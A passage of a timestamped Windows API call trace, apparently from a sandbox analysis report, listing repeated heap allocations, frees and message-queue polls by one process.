(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0168.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0168.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0168.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0168.589] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0168.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0168.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0168.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0168.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0168.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0168.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0168.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0168.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0168.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0168.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0168.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0168.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0168.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0168.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0168.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.590] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0168.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0168.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.591] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0168.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0168.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0168.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0168.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0168.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd468 [0168.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0168.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0168.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0168.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0168.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba390 [0168.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0168.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0168.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0168.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdae0 [0168.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0168.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0168.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0168.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0168.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0168.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0168.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0168.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0168.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0168.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0168.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0168.594] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0168.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0168.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0168.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0168.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd348 [0168.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba390 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f70 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd468 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0168.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0168.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0168.596] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0168.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0168.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.597] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0168.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0168.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.598] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0168.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0168.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0168.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0168.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.599] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.599] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.599] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.599] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.599] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0168.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0168.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0168.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0168.599] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 